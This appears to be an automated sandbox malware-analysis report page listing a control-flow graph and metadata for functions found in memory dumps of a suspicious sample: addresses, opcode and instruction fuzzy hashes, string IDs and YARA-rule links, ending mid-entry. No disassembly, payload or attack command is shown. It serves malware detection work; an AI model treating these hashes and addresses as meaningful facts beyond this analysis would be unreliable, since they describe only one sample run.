7ff8490ccf25-7ff8490ccf40 1677->1681 1682 7ff8490ccf6e-7ff8490ccfa0 1677->1682 1678->1666 1680->1661 1687 7ff8490ccde2-7ff8490ccdf5 1680->1687 1698 7ff8490cd088-7ff8490cd08d 1682->1698 1689 7ff8490ccdf7-7ff8490cce11 call 7ff8490cb1c0 1687->1689 1690 7ff8490cce49-7ff8490cce51 1687->1690 1689->1658 1704 7ff8490cce37-7ff8490cce46 call 7ff8490cb2f0 1689->1704 1697 7ff8490cce59-7ff8490cce5c 1690->1697 1693->1677 1701 7ff8490cce63-7ff8490cce6b 1697->1701 1715 7ff8490cd0a1-7ff8490cd0bf 1698->1715 1716 7ff8490ccfbc-7ff8490cd097 1698->1716 1701->1648 1706 7ff8490cccaa-7ff8490cccb7 1701->1706 1704->1690 1706->1701 1712 7ff8490cccbd-7ff8490cccd1 1706->1712 1712->1701 1724 7ff8490ccfe6-7ff8490ccfe9 1716->1724 1725 7ff8490cd06d-7ff8490cd085 1716->1725 1724->1725 1727 7ff8490ccfef-7ff8490ccff2 1724->1727 1725->1698 1728 7ff8490ccff4-7ff8490cd021 1727->1728 1729 7ff8490cd05b-7ff8490cd062 1727->1729 1730 7ff8490cd064-7ff8490cd06c 1729->1730 1731 7ff8490cd022-7ff8490cd03c 1729->1731 1733 7ff8490cd0c1-7ff8490cd111 call 7ff8490c9930 1731->1733 1734 7ff8490cd042-7ff8490cd04d 1731->1734 1734->1733 1735 7ff8490cd04f-7ff8490cd059 1734->1735 1735->1729
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: H
                                                                      • API String ID: 0-2852464175
                                                                      • Opcode ID: 54241aeefa1d0a9f22b09c467b0cfee67aaef5dc12a7a354db11f94356a7c149
                                                                      • Instruction ID: e52cf828a9f8c3d41559dbed5fa93abe8ec55cc08865d21dfef4ed558cefca03
                                                                      • Opcode Fuzzy Hash: 54241aeefa1d0a9f22b09c467b0cfee67aaef5dc12a7a354db11f94356a7c149
                                                                      • Instruction Fuzzy Hash: BDD1BC3090DA968FEB7CEF28D495675B7E1FF45340B2449BEC48AC3682DA29F846C741
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490CF6D7 Relevance: 1.6, Strings: 1, Instructions: 305COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M3_^
                                                                      • API String ID: 0-3756472669
                                                                      • Opcode ID: 73e56f56086c263879c88adb86ee1e41f3cbf60585e6f1039d858152f9f7eb55
                                                                      • Instruction ID: e4fbef7e08790931014690b4727fc442a63721a8e7affe5051f3a83e07d68d5b
                                                                      • Opcode Fuzzy Hash: 73e56f56086c263879c88adb86ee1e41f3cbf60585e6f1039d858152f9f7eb55
                                                                      • Instruction Fuzzy Hash: 2421B112D8D5E39EFF7D7A6925150FC2A90EF567A0F180276D64F860D3CC0CA88A5397
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490D4B89 Relevance: 1.5, Strings: 1, Instructions: 250COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: hW@I
                                                                      • API String ID: 0-1230802676
                                                                      • Opcode ID: f3728aa2032f0f58d09df0c4bcb8727621cff0c3712526963377a81b7e0b133f
                                                                      • Instruction ID: 09e9ba279657634de62b065fc7b6290d3ac134c63583e78002daab35318cdef9
                                                                      • Opcode Fuzzy Hash: f3728aa2032f0f58d09df0c4bcb8727621cff0c3712526963377a81b7e0b133f
                                                                      • Instruction Fuzzy Hash: 4071153590C9C98FEBB8FE1884565B837C4FF48351B1413B9D49EC79E2DE18E81A8781
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495C0218 Relevance: 1.4, Strings: 1, Instructions: 160COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID: 0-3916222277
                                                                      • Opcode ID: 5ae93b45c17b781dc353997937bef4c57eef2a682a69779d50673f991d6f73b3
                                                                      • Instruction ID: cffa3f4d4f3d20e74d2505dd3f7df56a8dba4e28cb1008dac4ac843a84d46471
                                                                      • Opcode Fuzzy Hash: 5ae93b45c17b781dc353997937bef4c57eef2a682a69779d50673f991d6f73b3
                                                                      • Instruction Fuzzy Hash: 47516C30D0D59E9FDB69EFA8D8516BDB7B1FF54740F2141BAC01AE7282CA386905CB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8496FAD81 Relevance: 1.3, Strings: 1, Instructions: 38COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3532843938.00007FF8496F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8496F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8496f0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (anI
                                                                      • API String ID: 0-4188620487
                                                                      • Opcode ID: d3cdb36e8d647d1f01f18c887a5fb5f36f6d32b9df6233de8ff016d17c8c0e0e
                                                                      • Instruction ID: f32bc2bb9dbb0c7d6ae4bfef66184d065dc81e0365d0f20ce693645a9c0aac99
                                                                      • Opcode Fuzzy Hash: d3cdb36e8d647d1f01f18c887a5fb5f36f6d32b9df6233de8ff016d17c8c0e0e
                                                                      • Instruction Fuzzy Hash: 9E01EC34E0D55BCFEBA1EF58C885ABDB7F0EF58352F144535D408D3698EA38A9848B90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495CB487 Relevance: 1.0, Instructions: 965COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fb0bd97a5049d357428f093086ac45a1d0b8f500b22d58b977ee9fef95bd9582
                                                                      • Instruction ID: 85f0414bb80c79b806d13ca1d0d424539f4646ee4f87de447f7e985854a53d0b
                                                                      • Opcode Fuzzy Hash: fb0bd97a5049d357428f093086ac45a1d0b8f500b22d58b977ee9fef95bd9582
                                                                      • Instruction Fuzzy Hash: 17822474A4891C8FCFA9EF18C894FA9B7B1FB68305F5041E9910EE7651DA31AE81CF44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495D6D59 Relevance: .8, Instructions: 804COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8fb1d990e3e293e8051d78309679c44e9d2bca427101ff5efd6f4713a49a7274
                                                                      • Instruction ID: e9569509adc71d7d7fcf4924fe2f17c0208cc0b835d0affa37a19816c5713250
                                                                      • Opcode Fuzzy Hash: 8fb1d990e3e293e8051d78309679c44e9d2bca427101ff5efd6f4713a49a7274
                                                                      • Instruction Fuzzy Hash: 3642227180D69A8FEB61FF28D8565FA3BB4FF14354F2542B6D05CCB192DA28A481CBC1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495CCBA4 Relevance: .8, Instructions: 763COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 97696b844cb7720ba657acbf2e0b8e2041b60d4ccb8eaadb66138174428a6018
                                                                      • Instruction ID: 188562628cfab9b109504a461f5dacb57ddb0cf4f2893682901892089c15e18e
                                                                      • Opcode Fuzzy Hash: 97696b844cb7720ba657acbf2e0b8e2041b60d4ccb8eaadb66138174428a6018
                                                                      • Instruction Fuzzy Hash: 64523674A4891D8FDF99EF18C898BA977B1FB68341F5041E9D00EE7661DA31AE81CF40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495CDCBD Relevance: .5, Instructions: 509COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 47688d11cbfd34dae9b977f0b434f3d3b5c867fe45d2eb85ff501890f452b17e
                                                                      • Instruction ID: 219b978ee1bbfbece0319cf24fb60062df1ade4b64d500960302fae869101434
                                                                      • Opcode Fuzzy Hash: 47688d11cbfd34dae9b977f0b434f3d3b5c867fe45d2eb85ff501890f452b17e
                                                                      • Instruction Fuzzy Hash: FE126870A4895D8FDF98EF18C898BA977B1FB68341F5041E9D00EE72A1DA35AD85CF40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495CCBBD Relevance: .5, Instructions: 492COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3eaf0f1ba51068ba9b85cee2bbbe47e69355432ecceb0fef58ffc92ed5609e51
                                                                      • Instruction ID: 6adddfb8f3de5a162bed55eb76ed8bdfc12415a7d5db0fb61051823284646029
                                                                      • Opcode Fuzzy Hash: 3eaf0f1ba51068ba9b85cee2bbbe47e69355432ecceb0fef58ffc92ed5609e51
                                                                      • Instruction Fuzzy Hash: 4A128934A4891D8FDFA9EF18C894FA977B1FB68341F5041A9D00EE7661DA35AE81CF40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495C9526 Relevance: .5, Instructions: 475COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 80c9efe24f83ff072f51dcadf71b71512d4e21d5260cd37049f8b0ece522890d
                                                                      • Instruction ID: c1f90274ed2f940d8e2bc8c5a647c293a3f1741f5eff2ed0bfc7aa032538a790
                                                                      • Opcode Fuzzy Hash: 80c9efe24f83ff072f51dcadf71b71512d4e21d5260cd37049f8b0ece522890d
                                                                      • Instruction Fuzzy Hash: B0F15C70909A8D8FEBB8EF28C855BE93BE1FF59341F10412AD84ED7291DB749984CB41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495C048F Relevance: .4, Instructions: 426COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 93db0e0a04c18dbd9977ee94fc117b1e54a5d083db0ed23cd8043359de93f719
                                                                      • Instruction ID: 2df2ed58014f4c378925973a9a1560ef469a1fdb96d76f11feae4ccea9675cdc
                                                                      • Opcode Fuzzy Hash: 93db0e0a04c18dbd9977ee94fc117b1e54a5d083db0ed23cd8043359de93f719
                                                                      • Instruction Fuzzy Hash: F7F1A03091D6968FEB5CDF24C4E06B537A1FF44350F6545BDC85E8B68ACA38E882CB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495C14D1 Relevance: .4, Instructions: 419COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 611f1f313c17364173a7d22ec7df73809c03d56ecb7266aa75a0b2a99ff476b3
                                                                      • Instruction ID: 270fa20eb3e95e5e99bfa3d6c97ef70ef1bad02dfd89c3fd917efa7032c87c94
                                                                      • Opcode Fuzzy Hash: 611f1f313c17364173a7d22ec7df73809c03d56ecb7266aa75a0b2a99ff476b3
                                                                      • Instruction Fuzzy Hash: 9DD1F130A0DB868FE378FF28D89197577E1FF44380B25457ED59AC7A82DA29B8428741
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495CCB43 Relevance: .4, Instructions: 412COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c09dddf3357af36aea6d1e2c9ad0854b7cf94413ad531ddf2aa5a3c1463eefba
                                                                      • Instruction ID: 449b6c6a83b18575f2b2ca9725a7dc4d55a91feac9941c116d8aab29d79379d0
                                                                      • Opcode Fuzzy Hash: c09dddf3357af36aea6d1e2c9ad0854b7cf94413ad531ddf2aa5a3c1463eefba
                                                                      • Instruction Fuzzy Hash: 07F17534A4891D8FDFA9EF18C894BA977B5FB68301F5041E9D00EE7661DA31AE81CF40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490D242F Relevance: .4, Instructions: 362COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7be17180e55fd52a736bb6bd66583f513a9ac95ac1fcc1d1285d3f15456bddeb
                                                                      • Instruction ID: 5f91d382aeb313e89031af29d3033dc5fd3602614b8c97a0c99c96197e5c0195
                                                                      • Opcode Fuzzy Hash: 7be17180e55fd52a736bb6bd66583f513a9ac95ac1fcc1d1285d3f15456bddeb
                                                                      • Instruction Fuzzy Hash: DAD1903051D6968FEF69DF08C4E46B177A5FF49350B5446BDC84A8B68ECA38F881CB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495C04AF Relevance: .3, Instructions: 334COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 85f2921b3e1f4c0acc064fe488d0fc1f27fee22f488abd64a8a3cafe7f498a54
                                                                      • Instruction ID: f74789940547cfedcb02d2d08a66560aa60fefd0c738bbe5dd3375325495e00f
                                                                      • Opcode Fuzzy Hash: 85f2921b3e1f4c0acc064fe488d0fc1f27fee22f488abd64a8a3cafe7f498a54
                                                                      • Instruction Fuzzy Hash: 86C1C03051D6968FEF1DDF24C4E05B537A1FF45340B6546BDD86A8B68BCA38E882CB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490D244F Relevance: .3, Instructions: 333COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e3a23618ef949b8b5de2e17c3503a459e2a0d6202934a785045934b37cba7fab
                                                                      • Instruction ID: 282400882244ce85a83ceb67ca4b30df84153f8eeee8ec6b8ff4823e2c3794d3
                                                                      • Opcode Fuzzy Hash: e3a23618ef949b8b5de2e17c3503a459e2a0d6202934a785045934b37cba7fab
                                                                      • Instruction Fuzzy Hash: F5C1AE3091D6868FEB2DDF18C0E46B177A5FF45351B5446BDC84A8B68ECA38F881CB41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490C8F47 Relevance: .3, Instructions: 305COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9da1ccaf9f0924c77b59874e043ae56fa3dc7119cfcd3f4d1933e0d7e07fbf61
                                                                      • Instruction ID: 64433a19d846f74e89e93ea506d677d4a74fbd7ff398a2baf777d57cb89bba66
                                                                      • Opcode Fuzzy Hash: 9da1ccaf9f0924c77b59874e043ae56fa3dc7119cfcd3f4d1933e0d7e07fbf61
                                                                      • Instruction Fuzzy Hash: 85212952D4D1D78EFE3D7E68281B0FC6754AF823E0F1801BAC92D871C2CC4CA8866396
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495CF8D0 Relevance: .3, Instructions: 299COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: face0e8fd55d2375672460791cdcd69ac43f6dd2039eb88c83c1e3756aba65c8
                                                                      • Instruction ID: c20fedd261e8324a30d74d7cca0670c2bb1fa4ce5ba12d3523cf71b8c27541bd
                                                                      • Opcode Fuzzy Hash: face0e8fd55d2375672460791cdcd69ac43f6dd2039eb88c83c1e3756aba65c8
                                                                      • Instruction Fuzzy Hash: 34810931E0CE4D8FEBA8EE68E855AB977E1FF64751F11427AD00DD7291DE20AC428780
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490D1D4F Relevance: .3, Instructions: 290COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ab404c7ff789a90a8ad855e042313c1677b711c9070ace589cbeb806a370279e
                                                                      • Instruction ID: ea373d2f6dae8b9df0b0f607b26196f2aedc6bb544064201912a3ed00c868ccc
                                                                      • Opcode Fuzzy Hash: ab404c7ff789a90a8ad855e042313c1677b711c9070ace589cbeb806a370279e
                                                                      • Instruction Fuzzy Hash: 47A1943090DA869FEB99EF18C091AB4BBA5FF55340F544279D04EC7A86CF28F851CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495CF888 Relevance: .3, Instructions: 274COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9d5fec29a56d2dda974819130045fd386bd7206953fd9fd285f99d524437d544
                                                                      • Instruction ID: 14fde2d2a0dcf6d02a13d777118ee1399ccea44b029973e4c2a1540081758e9a
                                                                      • Opcode Fuzzy Hash: 9d5fec29a56d2dda974819130045fd386bd7206953fd9fd285f99d524437d544
                                                                      • Instruction Fuzzy Hash: 3671E531A1DA4A4FE768FE28E8419B2B3E1FF54350B25427DD05EC3696DE29F8428784
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495C4E61 Relevance: .3, Instructions: 271COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b0db08437b7cc97a1f87b4d7e539e98b83f612e18a3b989c07b64364b9c6107b
                                                                      • Instruction ID: 62eaf13bb2fc09a11e99de42c1802691e5e32c65be4e79043710956e0adaa8dd
                                                                      • Opcode Fuzzy Hash: b0db08437b7cc97a1f87b4d7e539e98b83f612e18a3b989c07b64364b9c6107b
                                                                      • Instruction Fuzzy Hash: 8A912C70908A5D8FDB98DF58C844BE9BBF1FB59310F1082AAD40DE3251CB74A985CF81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490CAA96 Relevance: .3, Instructions: 270COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 24995521db93eee25a150dd2e97b6403e6fb42895666f45dec3666be7bcb4c70
                                                                      • Instruction ID: 435d7b68fd85fdd7c5c7ccd8f2754f9eab572ebdb5691a112a4d25f9e1462f15
                                                                      • Opcode Fuzzy Hash: 24995521db93eee25a150dd2e97b6403e6fb42895666f45dec3666be7bcb4c70
                                                                      • Instruction Fuzzy Hash: A2811431A0DA864FEB3DAE28945517577E5FF85391F14057ED08EC7283DE29F8028751
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490D6A16 Relevance: .3, Instructions: 268COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cc4de9b60244c2c2117c1b03d50c9958091ab65e8b4c82bcb6bafa19701a400b
                                                                      • Instruction ID: e698715b274d7b15c63b5d9ec13ae3159006913457e97bcca4fc047286e6078d
                                                                      • Opcode Fuzzy Hash: cc4de9b60244c2c2117c1b03d50c9958091ab65e8b4c82bcb6bafa19701a400b
                                                                      • Instruction Fuzzy Hash: 3481573190DA868FEB39AF289451075BBE5EF453A1F15427ED08EC3183CE29F8468752
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490D1226 Relevance: .3, Instructions: 267COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8a01be9c0c9201d6abd7992fcb6a09269b47d04f3d661f1590963e4655b920f0
                                                                      • Instruction ID: e9cdb54685a82a216375f279fabd1ab3bbaf926298d4abb6b5a620a68dfffdca
                                                                      • Opcode Fuzzy Hash: 8a01be9c0c9201d6abd7992fcb6a09269b47d04f3d661f1590963e4655b920f0
                                                                      • Instruction Fuzzy Hash: 93813631A0CA824FEBBCAE28944597977E5EF46395F14067ED48EC3583DE29F8028751
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490C8BF9 Relevance: .2, Instructions: 250COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: aa417fc74ac0bde70fe05c144f588d253d7ce5e87ee57c7ff388908da736c9bf
                                                                      • Instruction ID: e6a94fe86404a3027d94f722feef0db54577d3a1e533588d49abde3143338686
